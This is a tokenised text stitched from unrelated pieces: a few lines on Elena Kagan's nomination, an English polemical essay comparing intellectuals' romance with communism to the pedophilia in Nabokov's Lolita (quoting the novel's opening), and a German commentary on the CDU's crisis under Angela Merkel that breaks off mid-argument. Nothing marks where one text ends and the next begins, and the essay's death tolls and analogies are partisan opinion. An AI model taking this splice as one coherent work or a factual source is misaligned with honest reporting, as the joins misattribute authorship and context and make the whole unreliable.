Ms. Kagan did , as Mr. Obama boasted last week , argue the difficult Citizens United campaign - finance case before the Supreme Court .
That was the biggest case she inherited upon taking the job of solicitor general , who usually argues the major cases .
The president insisted that in tapping Ms. Kagan , he had achieved his objective of a justice who identifies with the lives of “ ordinary ” people .
Ms. Kagan has lived almost her entire life in New York ; Cambridge , Massachusetts ; and Washington .
May Day : The Conspiracy of Silence Around the Romance of Evil
“ The Soviet system , according to Malcolm Cowley , the American writer , ‘ was capable of supplying the moral qualities that writers missed in bourgeois society : comradeship in struggle , the self - imposed discipline , the ultimate purpose . . . the opportunity for heroism and human dignity . ’
Leon Feuchtwanger , the German writer , rejoiced in the ‘ invigorating atmosphere ’ of the Soviet Union where he found ‘ clarity and resolution . ’
John Dewey compared the ethos prevailing in the Soviet Union to ‘ the moving spirit and force of primitive Christianity , ’ and Edmund Wilson confessed that ‘ you feel in the Soviet Union that you are on the moral top of the world where the light never really goes out . ’
J.D. Bernal , the British scientist , found ‘ sense of purpose and achievement ’ and was persuaded that ‘ the cornerstone of the [ Soviet ]
Marxist state was the utilization of human knowledge , science and technique , directly for human welfare . ’ ”
– Paul Hollander , “ Judgments and Misjudgments , ” in Lee Edwards , The Collapse of Communism
Lolita , light of my life , fire of my loins , my sin , my soul .
Lo - lee - ta : the tip of the tongue taking a trip of three steps down the palate to tap , at three , on the teeth .
Lo. Lee. Ta .
She was Lo , plain Lo , in the morning , standing four feet ten in one sock .
She was Lola in slacks .
She was Dolly at school .
She was Dolores on the dotted line .
But in my arms she was always Lolita .
– Vladimir Nabokov , Lolita
Romance is no excuse for evil .
The slogan “ From each according to his ability , to each according to his need ” stimulates our atavistic moral impulses much as the sight of a woman ’s body stimulates a man ’s primitive reproductive impulses .
Both impulses can be perverted .
Marxism conflated the desire to help those in need with an intellectual system and political agenda based explicitly on violence and deceit .
This redirection of primitive moral desire towards an evil end is just as much a perversion of human nature as is the redirecting of sexual desire towards a child .
Romantic illusions , such as
“ you feel in the Soviet Union that you are on the moral top of the world where the light never really goes out ”
or
“ Lolita , light of my life , fire of my loins , my sin , my soul . ”
are not an excuse for evil .
The lingering effects of this romance corrupt the intellectual world to this day .
Twenty years after the fall of the Berlin Wall , I should not need to remind readers that communism explicitly celebrated the idea of violent revolution leading to a “ dictatorship of the proletariat , ” and according to which most known forms of morality , including human rights and justice , were dismissed as merely “ bourgeois morality . ”
Respect for human life was regarded as a bourgeois prejudice that could be overcome for the Marxist cause at any time , as Lenin stated explicitly in a speech published in Pravda in 1920 :
“ We say : morality is what serves to destroy the old exploiting society and to unite all the working people around the proletariat , which is building up a new , communist society . ”
If killing human beings “ served to destroy the old exploiting society ” then killing human beings was regarded as moral .
The subsequent actions of Lenin , Stalin , Mao , Pol Pot , and other Marxist leaders made it perfectly clear that the idealistic goal of building up a “ new , communist society ” led to the justification of mass murder .
Ideas have consequences .
Marxist communism was based on an intellectual system that openly justified dishonesty , violence , and murder in countless public writings that were debated as respectable intellectual material in universities around the world throughout the 20th century .
More than a hundred million people died as a result , and easily a billion more are unnecessarily poor today .
Thousands of years of cultural capital – trust , work ethics , craftsmanship , traditions , civility , and morality itself – were cheerfully obliterated in an unbelievably stupid , sadistic , and ineffective system .
We will never know the full human cost of Marxist communism .
Absurdly , when I bring up the crimes of communism to many people , they often respond with comments such as “ we all have blood on our hands ” or “ capitalist wars have killed millions as well . ”
But while the theory of communism explicitly advocated violence and dishonesty , the theory of classical liberalism was explicitly based on voluntary consent and honesty .
Advocates of classical liberalism in both the 19th century and 20th century have been among the leading opponents of imperialism and war precisely because they saw imperialism and war as betrayals of classical liberal principles .
Violence is unambiguously a betrayal of classical liberal principles .
Violence was unambiguously a legitimized element of Marxist theory and practice .
It was not an accident .
The intellectual reputations and moral credibility of Martin Heidegger and Paul De Man are forever tainted by their support for the Nazis .
They are still influential intellectuals , but their judgment is questioned , they cannot be taken as intellectually or morally authoritative insofar as their intellectual prowess failed to prevent them from making a horrible mistake in moral judgment .
Leading 20th century intellectuals advocated communism , were “ fellow travelers , ” or apologized for communist crimes , and yet more than twenty years after the fall of the Berlin Wall there has been no reckoning of this failure of moral judgment .
While there were certainly people who innocently allied themselves with communism who were ignorant of the Marxist endorsement of violence and deceit , there were plenty of intellectuals who were fully aware of comments such as that of Lenin above .
The conspiracy of silence around this particular romance of evil continues .
What can one do when one lives in a world in which the accomplices of evil are living peacefully all around us ?
What can one do when the iconography of Che and Mao remain fashion statements ?
How does one communicate the revulsion that we all ought to feel towards an ideology of violence that was beloved by many of the most respected thinkers of the 20th century ?
A woman I once dated had an uncle who exposed himself to young girls in her family .
In the social climate of the 1960s , everyone knew that he did it , but no one talked about it and no one stopped it .
I had a great uncle , a drunk , who hit on all the nubile young girls at family gatherings , and only much later did I hear about it from various cousins who had been hit on by him .
Many families had such an uncle , or cousin , or friend , or whatever , and the tradition was not to talk about it .
A sea change in moral perspective has occurred , thanks to feminism , in which we now realize that these issues must be addressed openly and directly , or else they will continue to take place and the perpetrators will continue to walk among us .
The pope is currently under scrutiny for allegedly allowing pedophile priests to escape condemnation and prosecution .
Roman Polanski was recently arrested for raping a thirteen - year old girl nearly thirty years ago .
Teachers are liable for criminal prosecution for not reporting suspicions of child abuse .
Our society has created a bright moral line around the issue of pedophilia ; there is nothing funny , charming , or romantic about it .
And yet Nabokov ’s Lolita creates a sympathetic narrative in which the reader experiences pedophilia as romance .
The morally mature reader is expected to transcend the narrative created by Humbert , and realize what a moral monster he is .
Yet no doubt countless less morally mature readers are drawn into the erotic fantasy of Humbert ’s world without realizing the moral monstrosity they have thereby become .
The romance of communism stimulated the political fantasy life of intellectuals for more than a hundred years .
A few morally mature intellectuals realized what a moral monster communism was , and yet countless less morally mature intellectuals were drawn into the political fantasy of communism without ever realizing what moral monsters they had become .
John Kenneth Galbraith was one of the most celebrated intellectuals of the 20th century .
A PEN prize was recently named after him .
And yet he celebrated Mao ’s cultural revolution in his 1973 account of his trip to China ( All Galbraith quotations below are from Theodore Dalrymple ’s excellent article in City Journal ) .
Milton Friedman was one of the most hated intellectuals of the 20th century .
There were protests when he won his Nobel Prize in the 1970s , and more recently when the University of Chicago proposed a Milton Friedman Center for Economic Research , more than a hundred faculty members protested the creation of such a center .
Friedman ’s crime was that he provided economic advice to the military dictator Pinochet , whose regime is responsible for the deaths of several thousand people .
As Friedman pointed out , he also advised the Chinese government , which even post - Mao was certainly responsible for more deaths than was the Pinochet regime .
Mao was responsible for four orders of magnitude more death than was Pinochet :
4,000 * 10 = 40,000 * 10 = 400,000 * 10 = 4,000,000 * 10 = 40,000,000 .
For those who are not math majors : Forty million is a LOT more than 4,000 .
Friedman did not endorse the Pinochet regime or the Chinese communist regime .
He was only interested in helping to alleviate poverty in both regimes , not in supporting the regimes themselves .
He is analogous to a health care worker who is aware of an abusive situation that he cannot stop , but who continues to provide health care for the child despite awareness of the ongoing abuse .
Yes , Friedman sat down with Pinochet and with the post - Mao Chinese dictators , both of whom were murderers .
But he did so in order to help the poor of both nations , and in both cases he succeeded in helping millions of people escape poverty by means of the more sensible economic policies that he proposed .
Galbraith , on the other hand , actually praised Mao ’s policies .
In the midst of the Cultural Revolution , after his visit to China , he managed to support the following claim by Sinologist John K. Fairbanks :
The big generalizations have all been agreed upon :
There has been a tremendous betterment of the material life and morale of the common people .
Compare this with the description by Jung Chang , who actually lived through the Cultural Revolution :
“ Relaxation ” had become an obsolete concept : books , paintings , musical instruments , sports , cards , chess , teahouses , bars – all had disappeared .
The parks were desolate , vandalized wastelands in which the flowers and the grass had been uprooted and the tame birds and goldfish killed .
Films , plays , and concerts had all been banned . . .
The atmosphere outside was terrifying , with all the violent street - corner denunciation meetings and all the sinister wall posters and slogans ; people were walking around like zombies , with harsh or cowed expressions on their faces …
As an indication of the terror of the day , no one dared to burn or throw away any newspapers .
Every front page carried Mao ’s portrait , and every few lines Mao ’s quotations .
These papers had to be treasured and it would bring disaster if anyone saw you disposing of them .
Keeping them was also a problem : mice might gnaw into Mao ’s portrait , or the papers might simply rot – either of these would be interpreted as a crime against Mao …
A tremendous betterment in the morale of the people ?
Galbraith ’s own descriptions of violence reveal a fond romanticism , “ The workers were rather proud of having confined their fighting to the morning … Sadly some windows did get broken . ”
After the deception and sadism of Stalin ’s Soviet Union , which was widely known by the 1950s , why did Galbraith and other intellectuals blindly fall in love with Mao ’s China all over again in the 1960s and 70s ?
Galbraith is the moral equivalent of a man who goes around telling everyone how much the girl enjoyed her “ date ” with Polanski ( “ a tremendous betterment of her morale ! ” ) , and who writes a book on how beneficially Polanski had used hot tubs , champagne , and Quaaludes to enjoy the company of young girls ( “ The girls rather enjoy the tussle . . .
Sadly one may have to use a bit of force in the end ” ) .
From a Humbert Humbert perspective , such a book might be a good read , but some of us have the moral maturity to realize that anyone who praised Mao ’s China is as much of a moral monster as Humbert was .
Romance , even sincere romance , is no excuse .
Humbert really did have romantic feelings for Lolita , just as Galbraith really believed his own romantic fantasy version of Maoist China .
There are cultures in which pedophilia is normal and accepted ; there are tribes in New Guinea , for instance , in which young adolescent boys are taught that the more semen they swallow the stronger warriors they ’ll become .
There are cultures in which Marxist communism is normal and accepted ; most of twentieth century academia .
When should we let bygones be bygones ?
The New York Times believes that the pope ’s neglect of pedophiliac priests in the past is a story worth writing today .
But one ca n’t imagine The New York Times doing an expose on academics ( or reporters ) who failed to report communist crimes , or who actively excused communist crimes , because there were too many , it was too normal – and The New York Times itself was too complicit in the crimes .
Marxist communism was more culturally accepted , and thereby more seductive , than pedophilia , while in sheer numbers far more human lives have been harmed .
Yet its advocates live proudly among us to this day , and many of those advocates and apologists who have died continue to be honored as the leading intellectuals of the 20th century .
When will the culture of intellectuals , academia and the media , be morally mature enough to repudiate this evil , and end this conspiracy of silence ?
Romance is no excuse for evil .
Aber was soll es auch sein , das Konservative ?
Rüdiger Suchsland
Merkel oder wie ich lernte , von der Leyen zu lieben
Die Kritik an den neuesten Haushaltsbeschlüssen von der CDU - Mittelstandvereinigung bis hin zu Unionsministerpräsidenten , die Absetzbewegungen der FDP in der Köhler - Nachfolge , die mögliche Ampelkoalition in NRW , dann jetzt auch Streit um Opel , um die Sicherungsverwahrung ...
Plötzlich gewinnt der Streit in der Koalition eine Eigendynamik , die sogar die Möglichkeit , dass sich Schwarz - Gelb in den nächsten Wochen selbst zerschreddern könnte , nicht als völlig utopisches Szenario erscheinen lässt .
Wahrscheinlich ist das nicht .
Denn wahrscheinlich wird die Aufmerksamkeitsverlagerung jetzt beginnende Fußball - WM Angela Merkel retten .
Trotzdem hat die bürgerliche Koalition die bislang versteckten Zersetzungserscheinungen in der Union sichtbar gemacht .
Der Zustand der CDU / CSU ist insgesamt desaströs .
Dabei ist Mitleid genau das , was der Union wirklich noch gefehlt hat .
Sie hat es auch nicht verdient , und das man es nach den vergangenen Wochen zu haben zumindest erwägt , kann ihren Anhängern so wenig recht sein wie ihren Feinden .
Mitleid mit der Union ?
So weit kommt 's noch .
Wie konnte es so weit kommen ?
" Wenn die Irrtümer verbraucht sind , sitzt als letzter Gesellschafter uns das Nichts gegenüber . "
Bert Brecht , Die Nachgeborenen
" Auch die alten Christen wußten sehr genau , daß die Welt von Dämonen regiert sei , und daß , wer mit der Politik , das heißt : mit Macht und Gewaltsamkeit als Mitteln , sich einläßt , mit diabolischen Mächten einen Pakt schließt , und daß für sein Handeln es nicht wahr ist : daß aus Gutem nur Gutes , aus Bösem nur Böses kommen könne , sondern oft das Gegenteil .
Wer das nicht sieht , ist in der Tat politisch ein Kind . "
Max Weber , Politik als Beruf
Langsam muss man Mitleid haben .
Man muss Mitleid haben mit Wolfgang Schäuble .
Was im Kopf Schäubles , des intelligentesten , interessantesten Unionspolitikers in der jüngsten Zeit vorgegangen sein muss , wüsste man wirklich gern .
Zweimal durfte er nicht Bundespräsident werden , obwohl er es wollte , jetzt verhinderte es Angela Merkel ein drittes Mal , seine einstige Praktikantin , die er noch zur CDU - Generalsekretärin gemacht hatte , eine Position , aus der heraus sie ihn als Vorsitzenden kaltstellte .
Man muss auch Mitleid haben mit Christian Wulff .
Auf Wulff , dem letzten Chancenreichen aus dem CDU - " Anden - Pakt " lastet das Verfahren das ihn auf den Schild gehoben hat .
Er ist bereits beschädigt , Selbst wenn er am 30 .
Juni ins
Amt kommen sollte , ist eine Hypothek da .
Er würde , wie Köhler , ein Präsident zweiter Klasse sein und zumindest viel Zeit brauchen , um sich aus dieser Rolle zu befreien .
Allerdings :
So schlecht , wie er jetzt geschrieben wird , ist Wulff dann auch wieder nicht .
Zugegeben :
Er wirkt grau und langweilig , er ist der weichgespülte Ochsentourtyp , der die meisten vernünftigen Menschen seiner Generation immer davon abgehalten hat , in die Parteipolitik zu gehen .
Und dass er zum zweiten Mal verheiratet ist und seine Frau ein Tattoo hat , macht ihn auch noch nicht wesentlich interessanter .
Von der Leyen ist die erfolgreichste Familienministerin seit langem
Man muss schließlich Mitleid haben mit Ursula von der Leyen .
Ihre Nicht - Kür zur Präsidentschaftskandidatin , obwohl sie doch schon als Präsidentin der Herzen gefeiert worden war , ist , wie immer man es auch wenden möchte , und was immer wirklich gelaufen ist in der Woche nach dem Köhler - Rücktritt , ein grandioses PR - Debakel der CDU und ihrer Kanzlerin .
Auch wenn sie manche , ( siehe Politisches Leyen - Spiel ) , gerade im Web , zur Hexe des Konservatismus stilisieren wollen , oder sie gleich jenseits allen Anstands für ihren Vater in Sippenhaftung nehmen .
Es hilft nichts :
Ob einem das nun politisch alles in den Kram passt , oder nicht : Von der Leyen ist die erfolgreichste Familienministerin seit langem .
Zu der Fülle von Projekten die sie realisiert hat , gehören allerdings auch viele , die bereits ihre Vorgängerin Renate Schmidt in Angriff nahm .
Von der Leyen ist , ob nun großbürgerlich oder landadelig oder keines von beidem , eine moderne Frau , deren Konservatismus sich in Grenzen hält .
Instinktiv spüren das all jene Provinzgranden der Union , die immer noch am alten Rollenbild der Frau - Kinder , Küche , Kirche - festhalten .
Von der Leyen ist eindrucksvoll und charmant .
Gegen ihren Einzug ins Schloss Bellevue sprach weniger , dass sie sich vor den Karren der unausgegorenen Internet - Zensurkampagne hatte spannen lassen - das war ein parteitaktischer Schachzug zur Befriedung ihrer Gegner - , als drei andere Gründe : Erstens die fällige Kabinettsumbildung , die Merkel offenbar vermeiden wollte .
Zweitens : Die Union hätte eines ihrer wichtigsten Talente für die Zeit nach Merkel für ein politisch impotentes Amt geopfert .
Zudem eine ihrer wenigen Spitzenpolitiker , die die wichtige schwarzgrüne Alternative verkörpern .
Drittens : Von der Leyen wäre eine für Merkel unbequeme Bundespräsidentin geworden .
Früher oder später hätte sich zwischen Kanzleramt und Bellevue ein Zickenkrieg entsponnen .
Mitleid ist nun allerdings genau das , was der Union wirklich noch gefehlt hat .
Sie hat es nicht verdient , und das man es zu haben zumindest erwägt , kann ihren Anhängern so wenig recht sein wie ihren Feinden ?
Mitleid mit der Union ?
So weit kommt 's noch .
Wie konnte es so weit kommen ?
Raumschiff Kanzlerlamt : Die Bundespräsidentenfrage
" Ich bedauere diesen Rücktritt aufs Allerhärteste " , sagte Angela Merkel in ihrer improvisierten Pressekonferenz unmittelbar nach dem Köhler - Rücktritt - ein schöner Sprachschnitzer .
Sie meinte wohl eher : " Ich verurteile diesen Rücktritt ... " .
Die Kanzlerin , die de facto allein über die Bundespräsidentenkandidatur entscheidet , hätte eine größere Zahl von Möglichkeiten gehabt : Zum einen die Steinbrück - Option .
Ein von Merkel geschätzter Kandidat aus der SPD wie etwa Peer Steinbrück als Vorgriff auf etwaige zukünftige Zusammenarbeiten .
Dann die Fischer / Vollmer - Option , also ein akzeptabler Grüner im Amt , als Vorbereitung eines späteren schwarz - grünen Bündisses .
Beide Optionen wären Konsenskandidaten gewesen .
Aber beide waren immer unwahrscheinlich , da sie sowohl den konservativen Unionsflügel , als auch , noch schlimmer , den neoliberalen Koalitionspartner vor den Kopf gestoßen hätten .
Die dritte Möglichkeit war dann die am Ende realisierte Wulff - Option , also ein schwarz - gelber Konsenskandidat .
Gerade diese Entscheidung für einen Mann , der allerlei Talente haben mag , aber für die Rolle des Bundespräsdidenten schlicht und einfach zu jung , zu unreif , zu leblos , zu unerfahren , oder einfach zu grau und blass und farblos ist , dem es - wie sonst nur Karl Carstens - an lagerübergreifender Autorität , oder zumindest an Beliebtheit - à la Walter Scheel - fehlt , wird über die Person Wulff hinaus auch als grundsätzlicheres Signal wahrgenommen :
Als Zeichen für die Entfremdung der politischen Klasse von den Wählern , für die Abgehobenheit im Raumschiff Kanzlerlamt .
Dafür , dass die Fragen " Was nützt der Partei ? " und " Was nützt der Regierung ? " für Angela Merkel wichtiger geworden sind , als die wichtigste Frage : " Was nützt dem Land ? "
Aber was genau nützt eigentlich der Partei ?
Vier Wochen katastrophale Entwicklungen
Der Partei , genauer den beiden Schwesterparteien , die zusammen die Union bilden , nützt in jedem Fall keine Niederlage von Wulff .
Darum wird es , ungeachtet der derzeitigen Medien - Stimmungslage auch nicht dazu kommen .
Es sei denn , in den nächsten drei Wochen setzte sich die innerparteiliche Merkel - Opposition rund um die jungen wilden Rechten um Mappus und die Alten vom Anden - Pakt , also Koch und Wulff , doch noch durch , und Wulff zöge unter Verzicht auf die eigene Karriereoption zugunsten der Partei seine Kandidatur zurück , um Merkel offen zu brüskieren - eine so faszinierende , wie denkbar unwahrscheinliche Option .
Aber nach vier Wochen der aus ihrer Sicht katastrophalen Entwicklungen - die verlorene NRW - Wahl , der Koch - Rückzug , der Köhler - Rücktritt , die missratene Kandidatenkür , die Revision der schwarzgelben Koalitionsverhandlungen in den jüngsten Haushaltbeschlüssen - wirkt die CDU / CSU überaus desorientiert .
Die Fähigkeit der Partei scheint derzeit vor allem darin zu bestehen , sich selbst ein Bein zu stellen .
Dies ist die wahre Sozialdemokratisierung der Union , von der Kommentatoren schon seit Jahren schwafeln .
Vor zehn Jahren wurde die Generalsekretärin der CDU , Angela Merkel , zur Parteivorsitzenden gewählt .
Manche Leute damals glaubten sich sicher , Merkel werde eine Übergangsvorsitzende sein .
Heute ist Merkel nach Kohl und Konrad Adenauer die am längsten amtierende CDU - Vorsitzende .
Mit der Nominierung Wulffs scheidet nach Koch der zweite gewichtige Ministerpräsident aus dem Kernbereich der Parteiführung , dem Vorstand , aus .
Es bleiben zwei lahme Enten : Der nordrhein - westfälische Ministerpräsident Jürgen Rüttgers sowie Bildungsministerin Annette Schavan .
Inhaltlich war das Unionsprofil zwischen CDU - Sozialausschüssen und Django Dregger , zwischen christlich - sozial und neoliberal nie auch nur annährend so scharf , wie das der SPD .
Aber die Union schien doch für etwas zu stehen .
Und wenn es nur die Verbindung aus gesundem Machtstreben , vager Sicherheitsrhetorik und allgemeinem , nie genauer definiertem " Konservativ " - Sein war .
Aber heute ?
Wäre die Union eine Marke , was wäre dann eigentlich ihr Unique Selling Point ?
Nicht einmal 50 Prozent der CDU - Wähler wissen Umfragen zufolge , wofür die CDU steht .
Auch die Union selbst weiß nicht mehr , wozu es sie gibt .
Aber das heißt nicht , dass es sie nicht lange geben wird .
Nicht libertär , nicht autoritär ; nicht sozial , nicht neoliberal : Die Mitte als CDU , die CDU als Mitte
Grob gesagt durchziehen die deutsche Politik zwei grundlegende Gegensatzlinien , anhand derer auch die Union politisch zu verorten ist : Zum einen der Konflikt um das Feld sozialer Gerechtigkeit , also der Konflikt zwischen Wohlfahrtsstaat und Neoliberalismus .
Zum zweiten der Wertekonflikt zwischen libertären und autoritären Werten .
Während die kleineren Parteien hier am weitesten auseinander streben und sich an den Extrempunkten dieser Konfliktlinien ansiedeln , müssen sich die Parteien mit dem Anspruch " Volkspartei “ zu sein , in deren Mitte positionieren .
Seit Angela Merkel vor gut zehn Jahren Vorsitzende der Christlich - Demokratischen Union geworden ist , hat sie ihre Partei auf der Matrix der Parteiprogramme mehrfach sehr stark verschoben : Zunächst 2003 - 2005 klar in Richtung Neoliberalismus .
Bei der Wahl 2005 gab es dann die Wähler - Quittung dafür , und es ging für die Union in der Großen Koalition dann wieder deutlich zurück in Richtung soziale Gerechtigkeit .
Ihre jetzige Position geht zwar dem Arbeitnehmerflügel der Union ( den Ost - Politikern , der CDA , Rüttgers ) immer noch nicht weit genug , den Neoliberalen aber schon viel zu weit .
Der Streit um liberale Werte wiederum konkretisiert sich in der Union an der Frage des " Familienbildes " .
Auch hier brachte Merkel eine klare Verschiebung der Union in Richtung libertäre Werte .
Merkel versuchte die Mitte als CDU , aber auch die CDU als Mitte zu definieren .
Dazu muss sie die Mitte möglichst breit aufstellen und lässt dadurch einerseits einen Teil der Rechten rechts liegen , andererseits ist sie in der Mitte zwangsläufig auch nicht punktgenau genug , um sich von anderen Parteien abzusetzen - so wie das Gerhard Schröder für einige Zeit gelang , der mit der SPD Ähnliches versuchte unter den Schlagworten : " Dritter Weg " und " Neue Mitte " .
Der Merkel - Virus des totalitären Pragmatismus
Wofür also steht die CDU ?
Programmatisch bietet sie ein Patchwork aus widersprüchlichen Allgemeinplätzen .
Ganz offensichtlich fällt es auch den Unions - Rechten extrem schwer , ihre eigene Position zu formulieren .
Mit Kochs
Abgang fehlt die einzige medienwirksame Gallionsfigur .
Und inhaltlich muss man sich nur das hübsche dünne Papierchen durchlesen , das unter dem Titel " Moderner bürgerlicher Konservatismus .
Warum die Union wieder mehr an ihre Wurzeln denken muss " auf der Webseite von Stefan Mappus nachlesbar ist .
Verfasst haben es Mappus , der unbefriedigte CSU - Ehrgeizling Markus Söder , der Junge - Union - Bundesvorsitzende Philipp Mißfelder und Hendrik Wüst , dessen politische Karriere bereits seit seinem erzwungenen Rücktritt als CDU - Generalsekretär in Nordrhein - Westfalen zuende ist .
Da findet man allerlei Allgemeinplätze zum aktuellen Stand des Immergleichen und die allzu alten Schlagworte über Konservativismus , Christentum , Abendland , den Zeitgeist und das " vermeintlich moderne " , die man alle auch schon in den Texten Günter Rohrmosers aus den 70er Jahren nachlesen kann .
Der Konservatismus steckt eindeutig in einer tiefen Identitätskrise .
Die Wurzeln der Union scheinen verdorrt .
Überraschend und traurig , wie uninteressant , wie uninspiriert das alles ist .
Als ob der Merkel - Virus des totalitären Pragmatismus und der Patchwork - Politik auch noch ihre Feinde infiziert hätte .
Aber was soll es auch sein , das Konservative ?
In einem sehr allgemeinen Sinn konservativ sind viele .
Man bleibt seinem Fußballverein treu , seinem Lieblingsessen , vielleicht sogar dem Ehepartner .
Irgendwie sind die DIE GRÜNEN also eine sehr konservative Partei .
Denn sie wollen die Natur bewahren , die Erde , sie wollen nachhaltig wirtschaften und denken .
Sie glauben , dass Vielfalt etwas prinzipiell Gutes ist , und sie haben zumindest in vielen Feldern Angst vor dem technischen Fortschritt .
Sie sind in manchem restaurativ gesonnen .
Sie sind für " Werte " und " Achtung " vor " dem Leben " oder gar " der Schöpfung " - was immer das auch sein soll .
Aber das betrifft dann doch nur Teilbereiche des Lebens .
Struktur - , geschichts - und gesellschafts - konservativ in einem viel allgemeineren Sinn ist auch die DIE LINKE .
Wahrscheinlich ist DIE LINKE sogar jene Partei , die der Union , jedenfalls Teilen von ihr , in dieser Hinsicht am ähnlichsten ist : Beide sehen sich irgendwie nach einer
Welt zurück , die vergangen ist : Die einen nach der DDR , die anderen nach der alten Bundesrepublik .
Nicht alle natürlich , sondern nur größere Minderheiten und eher die Wähler und die Funktionäre der niederen Ebene als die Mandats - oder Amtsträger .
Und auch diesen Nostalgikern ist klar , dass kein Zurück mehr möglich ist , dass dies eine romantische Sehnsucht bleibt .
Aber in der Politik geht es ja nun wirklich nicht immer um Vernunft .
Die Union besitzt kein eigenes Gesellschaftsmodell
Das komplette Dilemma der Unionschristen offenbart sich an ihrem Verhältnis zum Wohlfahrtsstaat .
Der wurde in seiner bundesrepublikanischen Ausprägung zwar komplett zur Regierungszeit der Union errichtet - in der Adenauer - Ära .
Aber von Herzen geliebt wurde er von CDU / CSU nie .
Er wurde er geduldet als notwendiges Übel , gedacht als Bollwerk gegen den Teufel des Sozialismus , den demokratischen der SPD , aber mehr noch den der Staatssozialisten des Ostens und den pervertierten des NS - Wohlfahrtsstaats .
Der CDU - Wohlfahrtsstaat war demgegenüber angewandte katholische Sozialphilosophie .
Aber die Partei selbst hat das nie begriffen .
Die Union , das bringt die Ära Merkel an den Tag , besitzt kein eigenes Gesellschaftsmodell , wie das alle anderen Parteien tun .
" Freiheit " und " Gerechtigkeit " wollen irgendwie alle , aber bei der SPD ist dies mit Gleichheit verbunden , bei den GRÜNEN mit Nachhaltigkeit und Ökologie , bei der FDP mit einer schrillen Unterforderung des Staats , ja viellicht gar mit Staatsfeindschaft Marke FDP , bei der LINKEN umgekehrt mit dessen Überforderung .
Was hätte demgegenüber die Union anzubieten ?
Besonders in den 1990 ern versuchte man es einige Zeit mit dem Begriff der Subsidiarität , mit der Idee von den kleinen Einheiten .
Aber das ließ sich nicht unkompliziert erklären , war zu wenig greifbar , und auch nicht in Zeiten der Globalisierung und der Erweiterung der Europäischen Union .
Auch für die Bauern , die Kleinbürger und die Provinzen gegen Städte und Arbeiterschaft kann man nicht mehr sein - in Zeiten , in denen die Kleinbürger links wählen , die wenigen verblieben Bauern grün .
Und die Frauen in den Städten Wechselwähler sind , die ein uneheliches Kind haben , für das sie einen Krippenplatz brauchen .
Statt einer Diskussion darüber , wie lange Kinder ihre Mutter brauchen , oder dass man Familie und Beruf nicht gegeneinander ausspielen soll .
Und dieser Krippenplatz ist zumindest so lange unbezahlbar , solange " Arbeiterführer " Rüttgers eine Verlängerung der Kohlesubventionen durchsetzt , die pro Arbeitsplatz hohe fünfstellige Summen kosten - mehr als ein Krippenplatz - und die CSU das Geld braucht , damit ihre Bauern - Stammwählerschaft weiterhin rentabel Pflege der heimatlichen Landschaft betreiben kann .
So bleibt der Union nur der schnöde unschicke Mittelweg , den man dann zwar in Theoriedebatten aristotelisch ummänteln kann , als Rationalität und Vermeiden des Extrem , oder mit dem Odo Marquard der Spätphase als " Abschied vom Prinzipiellen " , aber Stammwähler lassen sich damit so wenig mobilisieren wie Wechselwähler gewinnen .
Die Union dürfte es " ihrer " Kanzlerin und Parteivorsitzenden , die sie nicht erwählt hat , die sie nicht liebt , sondern bestenfalls erduldet , nicht vergessen haben , dass sie der Union die zwei größten Wahlniederlagen geführt hat .
Denn bei den Wahlen von 2005 und 2009 fuhr die Union die schlechtesten Ergebnisse ihrer Geschichte seit 1949 ein. 2009 war es nur das überproportionale Ergebnis der FDP , das die schwarzgelbe Mehrheit sicherte , 2005 hatte es bekanntlich nicht einmal dazu gereicht , und Merkel wäre ohne Gerhard Schröders weinseligen TV - Auftritt am Wahlabend bereits an diesem Tag Geschichte gewesen .
Man sollte also Merkel auch nicht überschätzen .
Die Idee der Christdemokratie hat sich überholt
Viel schwerer wiegt : Die Idee der Christdemokratie selbst hat sich überholt .
Christdemokratisch , das war eine Idee der westeuropäischen Nachkriegszeit .
Es bedeutete in den überwiegend katholisch geprägten Ländern Frankreich , Italien , Belgien und Österreich , aber auch in den protestantischen Niederlanden , in Skandinavien , und im ins Katholische , Westeuropäische verschobenen Westdeutschland das Bündnis von Groß - und Kleinbürgertum , Bauern und kirchlich gebundener Arbeiterschaft , katholischem Zentrum und demokratischem ( protestantischem ) Konservativismus in einer integrativen Volkspartei .
Sie war derart integrativ , dass sie sogar noch die opportunistischeren Reste des Faschismus wie ein Schwamm in sich aufsog .
Und darin , in ihrem Transformationscharakter , liegt auch der Grund , dass die christdemokratischen Parteien in den postfaschistischen Staaten BRD , Österreich und Italien am erfolgreichsten war , während sie in Frankreich schon vor Beginn der Fünften Republik gescheitert war , wo sie dann größtenteils in der Sammlungsbewegung des Gaullismus aufging .
In den anderen Ländern blieb sie Minderheitsposition .
Die Kernidee der Christdemokratie jener Jahre war vermutlich die soziale Marktwirtschaft , jene spezifische Ausprägung des sogenannten " Rheinischen Kapitalismus " , der ein Verfassung gewordener " historischer Kompromiss " und insofern auch eine sozialpartnerschaftliche Alternative zum Manchester - Kapitalismus war .
Eine zweite zentrale Idee der Christdemokratie war die europäische Einigung , in der viele nicht zu Unrecht eine Fortsetzung des Römischen Reiches mit modernen , demokratischen Mitteln sahen .
Nach 1989 und dem Zerfall der staatssozialistischen Alternative geriet beides und damit die Christdemokratie selbst in eine Identitätskrise .
Deutschland wurde mit dem Mauerfall protestantischer und damit individualistischer , in der Konsequenz neoliberaler .
Die alten ideologischen Grabenlinien innerhalb der deutschen Rechten gewannen wieder neue Bedeutung .
Die Union hatte mehr als genug damit zu tun , sich selbst zusammenzuhalten .
Für Zukunft , für programmatische Weiterentwicklung , für Projekte war da kein Raum .
Schwarz - Grün wäre heute noch am ehesten ein Projekt mit utopischem Potential , eine Option , die Phantasien und Möglichkeitssinn entfachen könnte .
Aber das dürften beide Parteien ihren Stammwählern kaum vermitteln können - und vielleicht finden es wirklich nur politische Kommentatoren mit Wohnsitz Prenzlauer Berg wirklich sexy .
Vielleicht sind Zeiten der Krise keine Zeiten für Projekte .
Vielleicht aber gerade doch .
Wenn alles ins Fließen gerät könnten sich ungeahnte Räume des Handelns öffnen .
Zumindest ist klar ( und eine Erfahrung der Merkel - Ära ) : Zuviel Pragmatismus kann unpragmatisch sein .
In der Großen Koalition , die anders als ihre Vorgängerin 1966 - 1969 nicht Ausdruck eines Mehrheitswillens , sondern Ausdruck einer Unentschiedenheit und insofern Koalition des Übergangs war , wurden manche Diskurse schlicht verdrängt und dadurch auf Eis gelegt .
Dazu gehörten alle Fragen der Ökologie , auch alle Fragen der Integration von Einwanderern .
Die Union musste ( durfte/ konnte ) ihr Verhältnis zum Marktliberalismus , der im FDP - Gewand ein Marktradikalismus ist , nicht klären .
Muss man jetzt also auch noch Mitleid mit den Unions - Rechten haben ?
Die beschädigte Malefizspielerin im Kanzleramt
Nicht ganz .
